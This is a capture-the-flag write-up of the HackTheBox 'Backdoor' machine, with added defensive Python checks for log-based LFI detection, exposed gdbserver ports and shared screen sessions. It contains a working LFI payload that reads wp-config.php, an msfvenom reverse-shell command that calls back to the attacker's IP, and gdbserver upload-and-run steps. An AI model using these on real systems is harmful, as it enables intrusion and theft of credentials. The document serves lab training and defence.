Prelude
Backdoor was an easy machine from HTB, developed by hkabubaker17. The initial foothold vector was pretty cool: we need to enumerate the running processes of the target machine using an LFI vulnerability present in a WordPress plugin. Once we have enumerated the processes, we find that one of the open ports is gdbserver’s remote debugging port.
We can then connect to that port and execute a malicious ELF file to gain a reverse shell on the target. After that, we can see that there’s a screen session running as root which is accessible by the low privileged user. We can then attach to that root screen session to escalate privileges.
Let me elaborate on how I solved this box.
Exploitation
Nmap returned the following results.
Nmap scan report for 10.10.11.125
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Backdoor – Real-Life
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
1337/tcp open waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There are 3 ports open, with a peculiar port 1337. I tried banner grabbing the port with nc, but the port didn’t display any banner after connecting to it. So, I directed the enumeration to port 80.
I navigated to http://10.10.11.125/index.php/ and found a WordPress page.
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20211231170454.png?w=810)
Clicking on Home redirected me to backdoor.htb.
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20211231170512.png?w=534)
So, to test virtual host routing, I added an entry to /etc/hosts and refreshed the page, but nothing changed.
I then ran wpscan with the scan mode set to aggressive. But it didn’t find anything useful, except that the site has directory listing enabled.
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20211231203139.png?w=830)
So, with the help of this blog, I started manual enumeration of the WordPress plugins by navigating to the /wp-content/plugins directory to view the installed plugins. Since directory listing is enabled, we should get a list of the installed plugins.
I navigated to http://backdoor.htb/wp-content/plugins/ and found the following.
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20211231203354.png?w=696)
I searched the plugin name in searchsploit and sure enough, there’s a hit! I found an exploit for an LFI vulnerability in the plugin ebook-download.
I confirmed the vulnerability by using the following payload.
http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
I got the credentials for the MySQL service from wp-config.php. So, I tried the credentials against the SSH service, but they didn’t work.
Then I decided to enumerate the target further by leveraging the LFI vulnerability we have at hand. I found a GitHub repo with scripts to enumerate a machine via an LFI vuln. I used the following command to run the network-info script.
bash network-info 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl='
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20220101212210.png?w=981)
Then I used the process-info script, which brute-forces the /proc/$pid/cmdline location to enumerate the running processes. However, the target server didn’t respond to /proc/sys/kernel/max_pid. The script uses the output of this file to determine the maximum number of brute-force attempts to perform, and because the target server didn’t respond for this file, I modified the script a little to use my own machine’s max_pid instead.
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20220101211851.png?w=441)
I ran it using the following command.
bash process-info 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=' > out.txt
After saving the raw PID brute-forcing output to out.txt, I cleaned out the unwanted strings using the following bash one-liner, writing the result to a file named test.out.
cat out.txt|sed -e 's:/proc/[0-9]\{1,6\}/cmdline::g' -e 's:<script>window.close()</script>::g' -e 's/PID:\ [0-9]\{1,5\}//g' > test.out
I used the following command to save it into a new file named test2.out with line numbers, so that line number = PID.
cat test.out|grep -n . > test2.out
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20220101211233.png?w=486)
Then I deleted the lines that don’t contain any letters, so that the empty entries get removed.
cat test2.out|sed -e '/[a-z]/!d' > pids
Now, I have the complete process list of the target.
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/image.png?w=881)
This output shows us that port 1337 is opened by gdbserver. gdbserver is a program used to perform remote debugging, so that we can run GDB on one machine and the program being debugged on another, over the network.
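As an added example (not part of the original write-up, and not the plugin’s or the enumeration scripts’ code), here is a Python check a defender could run over the Apache access log to spot this kind of abuse of the ebook-download endpoint. It flags ebookdownloadurl values that contain traversal sequences or absolute paths, and it counts distinct /proc/<pid>/ probes per source IP, which is the signature of the PID brute force used above. The log lines are constructed; the endpoint path is the one from the write-up, and the threshold of three distinct PIDs is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache combined log format (not real logs from the box).
SAMPLE_LOG = """\
10.10.14.75 - - [01/Jan/2022:21:22:10 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 200 3102 "-" "curl/7.74.0"
10.10.14.75 - - [01/Jan/2022:21:22:11 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/1/cmdline HTTP/1.1" 200 90 "-" "curl/7.74.0"
10.10.14.75 - - [01/Jan/2022:21:22:11 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/2/cmdline HTTP/1.1" 200 80 "-" "curl/7.74.0"
10.10.14.75 - - [01/Jan/2022:21:22:12 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=%2Fproc%2F3%2Fcmdline HTTP/1.1" 200 80 "-" "curl/7.74.0"
192.168.1.20 - - [01/Jan/2022:21:23:00 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=http://backdoor.htb/wp-content/uploads/book.pdf HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
192.168.1.21 - - [01/Jan/2022:21:23:05 +0000] "GET /index.php HTTP/1.1" 200 7400 "-" "Mozilla/5.0"
"""

# Combined log format: client ip, identd, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
PROC_RE = re.compile(r'^/proc/(?P<pid>\d+)/')
PLUGIN_ENDPOINT = "/ebook-download/filedownload.php"


def parse_line(line):
    """Parse one access log line into a dict of fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def lfi_reason(target):
    """Return (reason, decoded value) if the request target looks like LFI abuse of
    the plugin endpoint, otherwise None. Legitimate use passes a download URL,
    not a relative or absolute filesystem path."""
    url = urlsplit(target)
    if not url.path.endswith(PLUGIN_ENDPOINT):
        return None
    for value in parse_qs(url.query).get("ebookdownloadurl", []):
        value = unquote(value)  # parse_qs decoded once; also undo double encoding
        if ".." in value:
            return ("traversal", value)
        if PROC_RE.match(value):
            return ("procfs", value)
        if value.startswith("/"):
            return ("absolute-path", value)
    return None


def analyze(log_text, pid_threshold=3):
    """Return (events, bruteforcers): events is a list of (ip, reason, value) for
    suspicious requests; bruteforcers lists source IPs that probed at least
    pid_threshold distinct /proc/<pid>/ entries (assumed threshold)."""
    events = []
    pids_by_ip = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hit = lfi_reason(rec["target"])
        if hit is None:
            continue
        reason, value = hit
        events.append((rec["ip"], reason, value))
        m = PROC_RE.match(value)
        if m:
            pids_by_ip[rec["ip"]].add(int(m.group("pid")))
    bruteforcers = sorted(ip for ip, pids in pids_by_ip.items() if len(pids) >= pid_threshold)
    return events, bruteforcers


if __name__ == "__main__":
    found, brute = analyze(SAMPLE_LOG)
    for ip, reason, value in found:
        print(f"{ip:15} {reason:14} {value}")
    print("PID brute force from:", brute)
```

To run it against a real log, pass the file contents to analyze(); on the sample data the four requests from 10.10.14.75 are flagged and that IP is reported as a PID brute-forcer, while the download of a real URL and the plain page view are not.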
So, to confirm that we can connect to the gdb session, I started gdb and typed the following command to connect my client to the remote gdb debugging session.
target remote 10.10.11.125:1337
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20220101212711.png?w=789)
I then quit gdb and did some research on how to upgrade this gdb session to code execution.
By referring to this HackTricks page, I managed to get a reverse shell from this gdbserver session. I did the following steps to get a reverse shell from the remote gdb session.
I created an ELF binary and uploaded it using gdb.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.75 LPORT=9001 PrependFork=true -f elf -o binary.elf
Then, made it executable.
chmod +x binary.elf
Then opened the file in gdb.
gdb binary.elf
After that, I uploaded the binary and executed it using gdb.
# Set remote debugger target
target extended-remote 10.10.11.125:1337
# Upload elf file
remote put binary.elf binary.elf
# Set remote executable file
set remote exec-file /home/user/binary.elf
# Execute reverse shell executable
run
And I got a shell back!
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20220101221457.png?w=536)
![Self Five! GIF - HIMYM How I Met Your Mother Barney Stinson - Discover & Share GIFs](https://c.tenor.com/-YPukbu3zUkAAAAC/himym-how-i-met-your-mother.gif)
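The gdbserver foothold above works only because the debugging port was bound on a network interface rather than on loopback. As an added example (not part of the original write-up), here is a Python host check that parses /proc/net/tcp, resolves each listening socket to its owning process through /proc/<pid>/fd, and reports debug servers that are reachable from the network. The /proc/net/tcp text and the inode-to-process map below are constructed so the check runs offline; the list of tool names to flag (just gdbserver here) is an assumption, and only IPv4 sockets are parsed.

```python
import os
import socket
import struct

# Constructed /proc/net/tcp excerpt: gdbserver on 0.0.0.0:1337 (inode 32784),
# gdbserver on 127.0.0.1:1337 (inode 32790), sshd on 0.0.0.0:22 (inode 21001),
# and one established connection that is not a listener.
SAMPLE_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0539 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 32784 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0539 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 32790 1 0000000000000000 100 0 0 10 0
   2: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 21001 1 0000000000000000 100 0 0 10 0
   3: 7D0B0A0A:0016 4B0E0A0A:C3A2 01 00000000:00000000 00:00000000 00000000     0        0 22000 1 0000000000000000 100 0 0 10 0
"""

# Constructed inode -> (pid, cmdline) map, standing in for a real /proc walk.
SAMPLE_OWNERS = {
    32784: (1183, "gdbserver 0.0.0.0:1337 /tmp/app"),
    32790: (1184, "gdbserver 127.0.0.1:1337 /tmp/app"),
    21001: (700, "/usr/sbin/sshd -D"),
}

LISTEN = "0A"  # TCP_LISTEN state code in /proc/net/tcp


def parse_proc_net_tcp(text):
    """Return (ip, port, uid, inode) for every LISTEN socket in /proc/net/tcp text.
    Addresses are hex, little-endian for the IPv4 part and big-endian for the port."""
    listeners = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 10 or f[3] != LISTEN:
            continue  # header line or non-listening socket
        addr_hex, port_hex = f[1].split(":")
        ip = socket.inet_ntoa(struct.pack("<I", int(addr_hex, 16)))
        listeners.append((ip, int(port_hex, 16), int(f[7]), int(f[9])))
    return listeners


def socket_owners(proc_root="/proc"):
    """Map socket inode -> (pid, cmdline) by walking /proc/<pid>/fd on a live host."""
    owners = {}
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:
            continue  # not our process, or it exited
        for fd in fds:
            try:
                link = os.readlink(os.path.join(fd_dir, fd))
            except OSError:
                continue
            if not link.startswith("socket:["):
                continue
            try:
                with open(os.path.join(proc_root, pid, "cmdline"), "rb") as fh:
                    cmd = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
            except OSError:
                cmd = ""
            owners[int(link[8:-1])] = (int(pid), cmd)
    return owners


def audit(listeners, owners, tools=("gdbserver",)):
    """Flag listeners owned by a debug server that are bound to something other
    than loopback. Returns a list of finding dicts."""
    findings = []
    for ip, port, uid, inode in listeners:
        pid, cmd = owners.get(inode, (None, ""))
        name = cmd.split()[0].rsplit("/", 1)[-1] if cmd else ""
        if name in tools and ip != "127.0.0.1":
            findings.append({"pid": pid, "port": port, "bind": ip, "uid": uid, "cmd": cmd})
    return findings


if __name__ == "__main__":
    # Live run: read the real table and fd links (needs permission to read other users' fds).
    with open("/proc/net/tcp") as fh:
        for finding in audit(parse_proc_net_tcp(fh.read()), socket_owners()):
            print(finding)
```

On the sample data only the 0.0.0.0:1337 gdbserver is reported; the loopback-bound copy and sshd are not. On a live host the same check can be folded into an inventory job, since a debug server that is reachable over the network hands out code execution to anyone who can connect, exactly as the steps above demonstrate.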
Privilege Escalation
From the earlier enumeration, I saw that there’s a screen session running as root. For the uninitiated, Screen or GNU Screen is a terminal multiplexer, a software application that can be used to multiplex several virtual consoles, allowing a user to access multiple separate login sessions inside a single terminal window, or to detach and reattach sessions from a terminal.
The root user had an ACL set for user in /root/.screenrc.
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20220102141550.png?w=298)
This allows user to fully access the root user’s screen session.
Now, this file isn’t accessible to low privileged users. But nevertheless, I decided to test whether the low privileged user had access to the active root session.
I tested this using the following command.
screen -r root/root
The syntax is as follows:
screen -r <owner>/<screen-session-name>
And I got into a root screen session!
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20220102141738.png?w=417)
![Best Himym Barney What Up GIFs | Gfycat](https://thumbs.gfycat.com/DigitalGorgeousArmyworm-size_restricted.gif)
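The escalation above depends on two lines in root’s screenrc: multi-user mode switched on and an acladd (or aclchg) entry naming another account. As an added example (not part of the original write-up), here is a Python audit that parses a screenrc, collects the users granted access, and reports every grant to someone other than the file’s owner while multi-user mode is on. The screenrc text is constructed to resemble what the write-up describes, not copied from the box.

```python
import re

# Constructed sample of a root screenrc that lets another account attach
# (modelled on the write-up's description, not the box's actual file).
SAMPLE_SCREENRC = """\
# root's screenrc
startup_message off
multiuser on          # without this no other user can attach
acladd user           # 'user' gets full permissions on every window
aclchg ops +rwx 0     # 'ops' gets full permissions on window 0 only
"""


def parse_screenrc(text):
    """Return (multiuser_enabled, {user: description_of_grant}) from screenrc text.
    Recognises multiuser, acladd/addacl and aclchg/chacl; comma-separated user lists
    are expanded. Comments start with '#' at line start or after whitespace."""
    multiuser = False
    grants = {}
    for raw in text.splitlines():
        line = re.split(r"(?:^|\s)#", raw, maxsplit=1)[0].strip()
        if not line:
            continue
        parts = line.split()
        cmd = parts[0].lower()
        if cmd == "multiuser" and len(parts) > 1:
            multiuser = parts[1].lower() == "on"
        elif cmd in ("acladd", "addacl") and len(parts) > 1:
            for user in parts[1].split(","):
                grants[user] = "full (acladd)"
        elif cmd in ("aclchg", "chacl") and len(parts) > 2:
            scope = " ".join(parts[3:]) or "all windows"
            for user in parts[1].split(","):
                grants[user] = f"{parts[2]} on {scope} (aclchg)"
    return multiuser, grants


def audit_screenrc(text, owner="root"):
    """Return [(user, grant)] for accounts other than the owner that could attach
    to the owner's session. Grants without multiuser on are inert, so they are
    not reported."""
    multiuser, grants = parse_screenrc(text)
    if not multiuser:
        return []
    return [(user, grant) for user, grant in grants.items() if user != owner]


if __name__ == "__main__":
    for user, grant in audit_screenrc(SAMPLE_SCREENRC):
        print(f"root's screen session is shared with {user}: {grant}")
```

Pointed at /root/.screenrc (or any user’s ~/.screenrc) this reports exactly the kind of grant that made screen -r root/root work above; a grant that appears without multiuser on is not reported, because screen refuses other users in that case.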
Postlude
And that was Backdoor!
A great machine that demonstrated how cool enumeration can be!
Kudos to hkabubaker17 for building such an awesome box!
Peace out! ✌️